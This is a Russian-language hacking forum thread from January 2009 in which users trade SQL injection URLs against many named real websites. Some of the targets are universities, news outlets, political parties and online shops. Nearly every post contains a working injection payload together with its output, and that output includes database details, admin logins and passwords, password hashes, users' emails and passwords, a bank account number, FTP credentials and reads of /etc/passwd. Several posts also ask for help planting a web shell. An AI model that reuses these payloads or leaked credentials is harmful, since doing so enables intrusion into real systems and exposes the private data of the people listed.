http://www.designtrend.hu/index.php?inc=cikk&CId=-316/**/union/**/select/**/table_name+from+mysql.user--
SELECT command denied to user 'dcmagazin'@'localhost' for table 'user'
http://www.lit-across-frontiers.org/projects_detail.php?id=1'+UNION+SELECT+1,concat_ws (0x3a3a,v ersion(),user(%20),database()),3,4 ,5,6/*
Version:5.0.45
User:laf@localhost
Database:laf
тИЦ 10
PR 6
-m0rgan-
02.01.2009, 19:38
http://www.tekojoja.org.py/v1/news.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,user(),v ersion(),database()),3,4,5,6,7,8,9,10,11,12,13+fro m+user--
логин/пасс/юзер/версия/бд:
admin:admin:tekojoja_tekojoj@localhost:4.1.22-standard:tekojoja_bd
---------------------------------------------------------------
The End!
www.henleystandard.co.uk
http://www.henleystandard.co.uk/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
version() - 5.0.45
user() - hsta@localhost
database() - henleystanda
Таблицы:
henleystanda
adfeature_upsell
archive
archivemedia
breaking_news
comments
displayads
editorial
editorschoice
jobs
lineage :)
media
notices
registration
schools
schoolsnews
www.thepuckstopshere.co.uk
http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*
version() - 4.0.27-standard-log
user() - dbo69748003@212.227.127.13
database() - db69748003
Iceangel_
02.01.2009, 23:13
как обычно, еду...
http://www-hto.usc.edu/ppl/intro_page.phtml?id=-435+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16--
доступ к mysql.user=on
file_priv=on
magic_quotes=off
http://www.ittc.ku.edu/view_project.phtml?id=24/*%00*/+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22--
наглядный пример обхода фильтрации(ereg/eregi) благодаря ошибкам в пхп...
http://www.wfsj.org/news/news.php?id=-110+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_enc rypt(version(),0x73),0x73),9,10/*
4.1.7
админка:
http://www.wfsj.org/admin/
Gemini12
03.01.2009, 01:18
http://www.thepuckstopshere.co.uk
Почти все, пальцем в небо...
http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,concat_ws(0x3a,id,pwd,email),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--
это, судя по id, это админ, тока админку чето не нашел...
1:03f8b8f9005e0e23:c.p.valentine@open.ac.uk
lexus5122
03.01.2009, 01:55
Почти все, пальцем в небо...
http://www.thepuckstopshere.co.uk/news.php?r=1&t=2&id=-1+union+select+1,2,concat_ws(0x3a,id,pwd,email),4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users--
это, судя по id, это админ, тока админку чето не нашел...
http://www.thepuckstopshere.co.uk/logs/admin - Админка
03f8b8f9005e0e23 - toast - пароль
А вот логин...?
Gemini12
03.01.2009, 02:04
- Админка
- пароль
А вот логин...?
логин че то не нашел, я же вслепую тыкал, все перепробовал: user, username, login, name, user_name, user_login, login и т.д
Может у кого получится?
AkyHa_MaTaTa
03.01.2009, 04:19
PageRank: 6
http://oia.pdx.edu/ea/programs/search.php?pid=-9111+union+select+1,2,3,4,5,6,7,8,concat_ws(0x2f,n ame,pass,mail),10,11,12,13,14+from+users+limit+1,4--
Nbs.bg.ac.yu - PR8 ~3к
http://www.nbs.bg.ac.yu/view_file.php?file_id=-1562+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on()),8+from+cms_user/*
4 ветка..
Wosa.co.za - PR7 ~2.5к
http://www.wosa.co.za/sa/link_list.php?category=-4+union+Select+1,2,unhex(hex(version())),4,5,6+fro m+news/*
4 ветка..
C Новым 2009 )
spherics
03.01.2009, 14:55
Очаровательные пёсики Бульмастифы -)
Доступ закрыт но вывод есть в шапке -)
http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,version(),user( ),database()),2,3,4,5,6--
4.0.27-max-log
bullmast_mstf@v26.valuehost.ru
bullmast_mstf
http://catalog.bullmast.ru/dog.php?screen=1&id=-5935+union+select+concat_ws(0x3a3a,name,password), 2,3,4,5,6+from+users--
admin :: 8099d55d6551a908d0c0c379cde265b0
Караем УГ: Национальный университет Ганы
http://www.ug.edu.gh/index1.php?linkid=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())/*
spherics
03.01.2009, 17:56
Питерское интернет кафе!
http://www.shangrila-spb.ru/index.php?action=view&id=-73+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT (0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64 ),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- &module=newsmodule&src=%40random41940a897e943
Database Version: 4.1.11-Debian_4sarge7-log
Database name: shangrila
User name: adminn@localhost
Детишкам поиграться -)
http://www.play-publishing.com/?id=72+union+select+1,2,3,concat_ws(0x3a3a,version (),user(),database()),5,6,7,8,9,10,11--
4.0.22
majkel@play.play.com.pl
musiccd
тИЦ = 40
PageRank = 5
http://www.dorian.ru/catalog/dog.php?screen=1&id=-72+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database()),8,9,10,11,12--
5.0.67-log
u26951@10.10.10.216
u26951_catalog
тИЦ = 275
http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/*
version: 4.1.20
user: ssac@mrcrabs.toolbox.net
database: ssac
http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14/*
version: 4.0.21-standard-log
user: webuser@web1
database: studcent
http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/*
version: 4.1.22-standard-log
user: opednews_vidya@localhost
database: opednews_pearl
http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
version: 5.0.45-log
user: etouser@205.178.145.65
database: eto
http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
version: 4.1.22-standard-log
user: 334937_alfred@172.16.11.218
database: 334937_calcms
http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24/*
version: 4.0.24-log
user: rwjEditor@web.med.yale.edu
database: rwj
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13/*
version: 4.0.27-standard-log
user: dbo120565932@212.227.119.149
database: db120565932
http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/*
version: 5.0.45-Max-log
user: srv11037_forum21@c29-w.ht-systems.ru
database: srv11037_forum
user: lenar
pass: vcxzasdf123
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13/*
version: 5.0.45-log
user: oxid@localhost
database: synaptic
http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/*
version: 4.1.22-log
user: conex@alpha
database: conex
Народ, помогите ламеру!!!
Нашол уязвимость, полей 15, а что дальше делать,понять не могу. Вставлял любые коды, везде ошибка. попробуйте вы...скажите где ошибка
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
..::TROYAN::..
03.01.2009, 20:05
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
Forbidden You don't have permission to access / on this server.
гм...
Forbidden You don't have permission to access / on this server.
гм...
это сайт провайдера нашего....возможно вас просто не пускают
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,version(),16,17/*
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
Всё...всем спасибо...тупо провтыкал куда ставить запрос
народ. подскажите как можна вытянуть имя таблицы для получения pass?
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
Forbidden типа запрещенный дотсуп
http://irp.poltava.ua/news.php?news_id=8546[sql]
3-я ветка...
__________________________________________
"Журнал ДентАрт"
http://www.dentart.org/rubriki.php?rubr=-1+union+select+1,2,version(),4--
5.0.67-community
synaptic.ru
Докрутил, но такого еще не видел, не стал разбираться что куда сувать надо:
Если кто будет раэбираться,потом пожалуйста отпишитесь
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),ba nk_name,char(58),email,char(58),char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+synaptic.users/*
::tapakaiiika@yandex.ru::620be1
40702810990010002180:САНКТ-ПЕТЕРБУРГСКИЙ Ф-Л АКБ "СОЮЗ" (ОАО):vsevolod.trofimov@synaptic.ru::uu876ujih9 8
::olga160@rambler.ru::983016
::a_fedotov@pochta.ru::f7fb60
::metelev2007@mail.ru::584889
::rg.90@mail.ru::1d6b57
::evseevigor@mail.ru::34a06e
::olefimova@gmail.com::436c69
::IVAN VESELOV@SYNAPTIC.RU::b0b906
::IVAN.VESELOV@SYNAPTIC.RU::cbfcdf
::honda-civic@list.ru::5188dc
::spawnok@spawnok.com::0ebf27
::sergey.g@freenet.de::4e1891
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5, 6,7,8,9,10,11,12,13+from+psy.users/*
Всеволод Викторович Трофимов:vsev
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.users/*
seva:vsev
efaberge:eggs
jurist:140382
igorv112:qazwsxedc
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opini on_users/*
seva:vsevolod@artlinemedia.ru:ceb3e6
Всеволод:seva@artlinemedia.ru:282573
Сева:music@yandex.ru:c65cfa
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char( 58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+fr om+oxid.ftp_servers/*
mp3.int.ru:21:anonymous:doh@doh.doh
212.182.63.138:21:anonymous:doh@doh.doh
216.71.74.4:21:anonymous:doh@doh.doh
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5 ,6,7,8,9,10,11,12,13+from+oxid.developers_app/*
oxid:vbiflt
oxid1:vsev
nitroamplifire:xiquliquitrux
winamp:pmaniw
leosoft:leoam
DJUSHMAN:andron
gf:gf
Yliya:01071986
Ylizka:01071986
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char (58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.autho r/*
Эстрина Инна:inch@molinos.ru:ghjtrn
РОФФ ТЕКНОЛОДЖИЗ:svetlana@roff.ru:techno
Агентство "Выше Радуги":esmi@uprainbow.ru:rainbow
Урюпин Д.А.:gebo@land.ru:kalendar
openmusic.ru:openmusic@openmusic.ru:rainbow
:info@kushnir.ru:production
:info@castlerock.ru:rok
Лебедева Елена:internet@kushnir.ru:kushnirint
Оксана и Егор:eglute@nm.ru:3214фф
Саванчук Катерина:marsinred@mail.ru:123фыв
Мария Карпеева:thedevoted@mail.ru:ghrtt
Евгения Карасева:ekarasyova@mail.ru:dsdw2
Елена Волосова:volosova@reakcia.ru:action
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,c har(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.u ser/*
:357a136b2575f97f:root :5be372e038520af0:oxid localhost:4844f090239f56e0:wikiuser :499bd4ec632aac25:dmitr
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58 ),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/*
%::oxid %:test: %:test\_%: %:wikidb:wikiuser
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+malkov.users/*
email@email.ro: 2222:п
http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password) ,4,5,6,7,8,9,10,11,12,13+from+identification.users +limit+0,1/*
seva:vsev Larisa:gammy
Скажите плиз, как из ссылки которую дал R1dex вытянуть таблицу чтоб потом можна было позырить пасс?
Или киньте ссыль на какой нить фак по этой теме.
Всё обыскал...нет такого. Просто не пойму зачем нужен user и database толку с них?
Скажи плиз...где ты названия таблиц брал!! У меня уже крышу сносит! Помоги нубу
http://www.cohenhillel.org/about/profile.php?pid=-379+union+select+concat_ws(0x7c,user(),database(), version()),2,3/*
scully@localhost|scully|4.1.22
2vakula если правильно понял твой вопрос рой в сторону information_schema чтоб знать названия таблиц если версия 5.....) а user() и database() определенной ценности не несут) поможет только если ты имеешь доступ к mysql.user)
Thrasher88
04.01.2009, 12:43
kino.com
http://www.kino.com/video/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database())--
USER kino@lma671.siteprotect.com
VERSION 4.0.12-standard
DATABASE kino
Google PR: 7
spherics
04.01.2009, 14:33
http://www.pangeaday.org/filmDetail.php?id=-72/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),data base()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--
Version:5.0.45-log
User:dr30628@192.168.1.131
Database:pangea
PageRank = 7
http://www.gsi.ru/catalog.php?id=-72+union+select+1,2,3,concat_ws(0x3a3a,version(),u ser(),database()),5,6,7,8,9,10,11,12,13--
Version:4.0.24_Debian-10sarge2
User:root@localhost
Database:gsi
тИЦ = 800
http://mympeg.ru/video.htm?id=-72+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a ,version(),user(),database()),11,12,13,14,15--
Version:4.1.22-log
User:mympeg@localhost
Database:wwwmympeglggru
PageRank = 5
Thrasher88
04.01.2009, 15:43
bloggingheads.tv
http://bloggingheads.tv/video.php?id=-1+union+select+concat_ws(0x7c,user(),version(),dat abase())--
Обратите внимание на вывод! :) Возможно, кому то покажется, что принтабельных полей нет.. но, если присмотреться ;)..
VERSION: 5.0.45-log
USER brainwav@66.39.65.222
DATABASE brainwav_bhtvee
Логин и пасс админа: rw:exnihil0
Google PR: 7
spherics
04.01.2009, 16:29
http://www.usp.br/internacional/home.php?id_cont=12345674+union+select+1,2,3,4,5,c oncat_ws(0x3a3a,version(),user(),database()),7,8,9 ,10,11,12,13,14,15--&idioma=en
Database Version: 4.0.24_Debian-10sarge3-log
Database name: w3internacional
User name: w3internacional@localhost
PageRank = 8
http://www.skyalbum.com/showAlbum/222225368/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),data base()),8,9,10,11,12,13,14,15--
Version:5.0.22
User:skyalbum_db_user@localhost
Database:skyalbum
PageRank = 7
http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,(SEL ECT/**/CONCAT(User,0x7873716C696E6A64656C,Password)/**/FROM/**/mysql.user/**/LIMIT/**/8,1),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15--
[1]:root:
[2]::
[3]::
[4]:vbulletin_user:6081047447093d5f
[5]:socu:7007c5b04ac32a70
[6]:skyalbum_db_user:5d651ca80db22e8a
[7]:skyalbum_user:17f2b11a7aaa0d14
[8]:skyalbum_db_user:5d651ca80db22e8a
Читаем /etc/passwd и так далее
http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,LOAD _FILE(0x2F6574632F706173737764),0x7873716C696E6A65 6E64),8,9,10,11,12,13,14,15--
http://www.specialradio.ru/p&d/?id=722222+union+select+1,2,3,4,concat_ws(0x3a3a,v ersion(),user(),database()),6,7,8,9,10--
Version:4.1.22
User:specialr_speci01@node1.hc.ru
Database:wwwspecialradior_specialradio
тИЦ = 1000
PageRank = 6
..::TROYAN::..
04.01.2009, 20:04
http://pointsonline.com/php/get_merchant_info.php?a=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase()),2,3--
loyalty@localhost:4.1.22-standard-log:loyalty
http://www.kinoteatrdoc.ru/press.php?id=-1+union+select+version(),user(),database()--
version():4.1.22
user():kinoteatr_mysql@194.85.92.114
database():kinoteatr_kd
PR:5; тИЦ:850
http://sok.sao.mos.ru/news_full.php?id=-1+union+select+1,unhex(hex(user())),unhex(hex(vers ion())),unhex(hex(database())),5--
version():4.1.12
user():sao@chicken
database:sao
PR:4; тИЦ:700
http://www.doctor-gynecolog.ru/index.phtml?id=-1+union+select+concat_ws(0x3a,666,username,userpas s),2+from+poll_user+limit+0,1/*
version():5.0.45
user():medsunr_d-gyn@localhost
database():medsunr_d-gyn
PR:3;тИЦ:50
dr.Pilulkin
05.01.2009, 04:07
http://www.aquaponics-shop.com/aquaponics-shop/products.php?prod_id=-25+union+select+1,2,binary(user()),4,5,6,7,8--
apshop@localhost
5.0.16
aquaponicsshop
http://www.ibaysilvershop.com/show_cart.php?new=cat_id=42%20AND%20prod_id=-3+union+select+1,2,user(),4,5,6,7,8--
ibaysilv_admin@localhost
5.0.67-community
ibaysilv_ibays
http://www.ibaysilvershop.com/show_cart.php?new=cat_id=42%20AND%20prod_id=-3+union+select+1,2,concat_ws(char(58),username,pas sword,email),4,null,6,7,8+from+ibaysilv_ibays.admi n--
edmd_2005:edmd_2005:info@ibaysilvershop.com
http://www.ibaysilvershop.com/admin/
lexus5122
05.01.2009, 04:08
Помогите залить шелл:
http://log.hotfix.ru/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null %20%20,null,null,null,null,null,null,null,null,nul l,null%20%20,null,null,null,null,null,null,null,nu ll,null,null%20%20,null%20from%20pphl_users%20limi t%200,1&action=edit
только предварительно войдите акк:
имя: lexus22
пароль: RmPhsJ
Rfe.org - PR 8 ~3к
http://rfe.org/showCat.php?cat_id=-2+union+select+1,unhex(hex(concat_ws(0x3a,user,pas sword))),3,4,5,6,7,8+from+mysql.user/*
4 ветка + права
PR 4
http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_page='
скуль
управление гибдд
..::TROYAN::..
05.01.2009, 14:04
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,pass ),6,7+from+test_users+limit+1,1--
cannabies::xqjhze
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,table_name,6,7+from+informa tion_schema.tables+limit+0,1--
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7--
intelit_user@localhost:5.0.67-community-log:intelit_intelit
тИЦ: 20
Pagerank: 3
http://www.ukbaristachampionship.co.uk/index.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5 ,6--
user(): ukbaristac@213.171.218.94
version(): 4.0.20-standard-log
database(): ukbaristac
PR: 4
PR 4
http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_page='
скуль
управление гибдд
кто решится раскрутить?
F4R, diznt
http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_page=-1
я думаю это не иьект!
Gemini12
05.01.2009, 21:33
F4R, diznt
я думаю это не иьект!
это пхп
Gemini12
06.01.2009, 01:07
http://www.ajour-travel.ru/tab.php?strana='
Элементарно не смог посчитать количество столбцов. Нервы сдали после такого.................. :eek:
spherics
06.01.2009, 02:33
http://info.twtelecom.net/info.php?id=-2+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3--
5.0.22
info@localhost
info
http://www.allyth.com/page.php?lnkid=601111+union+select+1,2,3,4,5,conca t_ws(0x3a3a,version(),user(),database())--
5.0.67-community
almoonn_rfaah@localhost
almoonn_rfaah
http://www.sabeel.org/etemplate.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a3a,version(), user(),database()),6,7,8,9,10,11,12,13--
5.0.45-community-nt
web@localhost
502401045_sabeel
http://www.ieeta.pt/sias/high_details.php?id=-98+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6--
PageRank = 7
4.0.26
licinio@srv1-ieeta.ieeta.pt
sias_extended
AkyHa_MaTaTa
06.01.2009, 05:28
это пхп
Это не пхп, sql но в Limit - ничего не зделаешь.
Эдушный шоп ( пр 6 )
http://bookstore.juilliard.edu/pages/music_books.php?id=-823+union+select+1,concat_ws(0x2d2d2d,user,host,pa ssword,file_priv),333333+from+mysql.user--
есть пользователи с host % и file_priv Y ( tim:abs123), но открытых портов которые смахивали бы на Mysql не нашел.
Вот админы
http://bookstore.juilliard.edu/pages/music_books.php?id=-823+union+select+1,concat_ws(0x2f,username,passwor d,priv,email),3+from+users+where+priv=0x61646d696e--
chung:presto
jonsoons:54645464
Админка:
https://bookstore.juilliard.edu/admin/
-=Razor=-
06.01.2009, 05:52
http://www.vfs.com/curriculum.php?id=3+union+select+1,2,3,unhex(hex(g roup_concat(table_name))),5+from+information_schem a.tables/*
5.0.22-standard-logvfscom_dbwebmaster@localhost
ТИЦ:160
PR:6
http://www.thisspartanlife.com/index.php?id=-999+union+select+1,concat_ws(char(32,45,32),%20ver sion(),user(),database()),3,4--
5.0.67-community - tsl_admin@localhost - tsl_admin
ТИЦ:30
PR:5
======
http://www.mmdb.ru/index.php?action=perf_by_genre&id_genre=-1033+union+select+1,version()/*
Version: 4.1.22-log
database: wwwmmdbusersru
user: mmdb@localhost
ТИЦ:40
PR: 5
Держите может у кого получится....сам не смог ничё сделать
http://www.fcmetalurg.com/news/index.php?id=1350
spherics
06.01.2009, 07:43
Держите может у кого получится....сам не смог ничё сделать
http://www.fcmetalurg.com/news/index.php?id=1350
Там не нашел но тут да
http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10,11,12,13,14,15,16,17 ,18,19--
Version:4.0.27-standard-log
User:fcmetalu_club@localhost
Database:fcme
Onestops.info - PR6 ~1.5к
http://www.onestops.info/category.php?cat_id=-10'+union+select+1,concat_ws(0x3a,table_name,table _schema),3+from+information_schema.columns+where+c olumn_name+like+'name'%23
5 ветка..
Metalstorm.ee - PR5 ~1к
http://www.metalstorm.ee/awards/categories.php?cat_id=-7+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5+from+information_schema.columns+where +column_name+like+0x70617373776f7264+limit+0,1/*
5 ветка..
Apricorn.com - PR5 ~1к
http://www.apricorn.com/products.php?cat_id=-52+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16/*
4 ветка..
Народ если можно выложите пример где разрешено LOAD_FILE() в скуле. А то чтото перерыл кучу всего а так и ниразу не видел как это работает. Такой впечатление что чтото неправильно делаю потому как всегда резултат null.
Извините если offtop.
Iceangel_
06.01.2009, 10:32
2 zenon2
понимаю тебя чел... у самого раньше такой же вопрос был...
http://www.abbotsfordinmotion.ca/news/general.php?id=-5307'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20'1
2 zenon2
понимаю тебя чел... у самого раньше такой же вопрос был...
http://www.abbotsfordinmotion.ca/news/general.php?id=-5307'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20'1
спасибо:) Хоть раз посмотрел:)
http://filtr-s.ru/?b=content&id=-1+union+select+concat(user(),0x3a,version(),0x3a,d a tabase())--
user(): u23366@78.108.81.81
version(): 5.0.67
database(): b23366
http://www.teatrdoc.ru/plays.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5--
user(): kinoteatr_mysql@194.85.92.114
version(): 4.1.22
database(): kinoteatr_td
тИЦ: 500
PR: 5
http://www.littlite.com/product.php?id=-30+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7--
user(): littlite@localhost
version(): 5.0.32-Debian_7etch8-log
database(): littlite
тИЦ: 10
PR: 4
maxpet1212
06.01.2009, 20:02
товарищи, поясните плз. как бороться с такими ситуациями:
http://www.respect.at/index.php?lang=1+order+by+3-- все норм.
а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--
The used SELECT statements have a different number of columns
и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.
спасибо.
http://www.sinodipc.ru/index.php?id=4+union+select+1,2,3,4,version(),6,7, 8,9,10/*
4.1.22-log
Челябинский сайт партии яблоко:
http://www.chel.yabloko.ru/persons/print.phtml?id=-1+union+select+1,version(),user(),database(),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31--
version():5.0.32-Debian_7etch8-log
user():chel@localhost
database():chel
PR:6;тИЦ:2500;
Офиц. сайт главы этой партии:
http://www.yavlinsky.ru/news/index.phtml?id=-3484+union+select+1,2,3,4,5,6,7,8,9,10,version(),1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
version(): 5.0.32-Debian_7etch8-log
user(): gya@localhost
database(): gya
PR:6;тИЦ:750
(login:Администратор;password:adminfo rever),тока хз куда его вводить.
Офиц. сайт партии родина:
http://www.rodina-nps.ru/library/print/?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3a,version(),user(),database()),16,17--
version():4.1.22-standard-log
user():rodinad_user@localhost
database():rodinad_test
PR:6;тИЦ:220;
Octave_Parango
06.01.2009, 21:11
(login:Администратор;password:adminfo rever),тока хз куда его вводить.
Возможно тут, сам не пробовал:
h**p://yavlinsky.ru/manager/
Octave_Parango
не, не подходит
это из таблицы forum_users но к форуму тоже не подходит
http://www.lymphnotes.com/pro.php/id/68'
дальше чот не прёт
AkyHa_MaTaTa
06.01.2009, 23:18
товарищи, поясните плз. как бороться с такими ситуациями:
http://www.respect.at/index.php?lang=1+order+by+3-- все норм.
а вот так
http://www.respect.at/index.php?lang=-1+union+select+1,2,3--
The used SELECT statements have a different number of columns
и хз как подступиться. разъясните если не сложно плз. и таких оч. много на пути попадается.
спасибо.
у тебя данные отличаються, то есть сначало при 1+order+by+3--
а при -1+union+select+1,2,3--
то есть вот
http://www.respect.at/index.php?lang=1+union+select+1,2,3--
http://www.lymphnotes.com/pro.php/id/68'
дальше чот не прёт
Хуясе, 43 колонки
http://www.lymphnotes.com/pro.php?id=77'+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,concat_ws(0x2f, version(),user(),database()),24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43/*
4.0.25/lncom@localhost/lncom
www.watercampws.uiuc.edu - пр6
http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,f ile_priv)+from+mysql.user+limit+4,1
kaap/%/7522af592a19ac45/Y
kaap:BlankPwd
http://www.respect.at/index.php?lang=1+and+lower(substring(version(),1,1 1))=char(52,46,48,46,50,55,105,110,111,100,101)
version() - 4.0.27inode
http://www.respect.at/index.php?lang=1+and+lower(substring(user(),1,32)) =char(114,101,48,48,48,51,51,48,64,117,98,104,48,4 9,45,111,117,116,50,46,117,98,104,46,105,110,111,1 00,101,46,97,116)
user() - re000330@ubh01-out2.ubh.inode.at
__________________________________________________ _______________________
"Мезотерапия Украины"
http://www.mesoterapia.org.ua/?mid=-40+union+select+version(),2,3--
..::TROYAN::..
07.01.2009, 02:38
http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,data base(),0x3a,version()),8,9,10,11--
avi@localhost:avi_corp_gov:5.0.67-log
PR:6
тИЦ: 500
http://www.corp-gov.ru/forum/index.php3?node_id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,us er_password),8,9,10,11+from+phpbb_users+limit+1,3--
froland:300c2f6225b9944ab0da38ecca94b4f7:mtmenj64
Форум phpbb тут http://www.corp-gov.ru/forums/
версия 2,0,23 шелл так и неполучилось залить=//
..::TROYAN::..
07.01.2009, 03:16
http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7--
ezh@localhost:5.0.51a-log:aib
PR:2
Тиц:20
http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat(login,0x3a,password),3,4,5 ,6,7+from+users--
http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7+from+phpbb_users--
ezh:$H$9apRNOB5h3fEpJ.QS1Ox8PyLnYp9j0
http://www.aib.in.ua/news/rubric/?id=-5+union+select+1,table_name,3,4,5,6,7+from+informa tion_schema.tables--
-m0rgan-
07.01.2009, 03:37
Хостинг:
http://www.vianetworks.net/news.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd) ,4,5,6,7,8,9,10,11,12+from+users--
логин/пасс:
admin:a66cc0703df7a7af2f0624760d098206
------------------------------------------------------------------
The End!
lexus5122
07.01.2009, 08:36
www.watercampws.uiuc.edu - пр6
http://www.watercampws.uiuc.edu/index.php?menu_item_id=-1+union+select+concat_ws(0x2f,user,host,password,f ile_priv)+from+mysql.user+limit+4,1
kaap/%/7522af592a19ac45/Y
kaap:BlankPwd
http://www.watercampws.uiuc.edu:80/index.php?menu_item_id=1<alert(5201314)> :)
"Cайт Санкт-Петербургской международной конной выставки "Иппосфера."
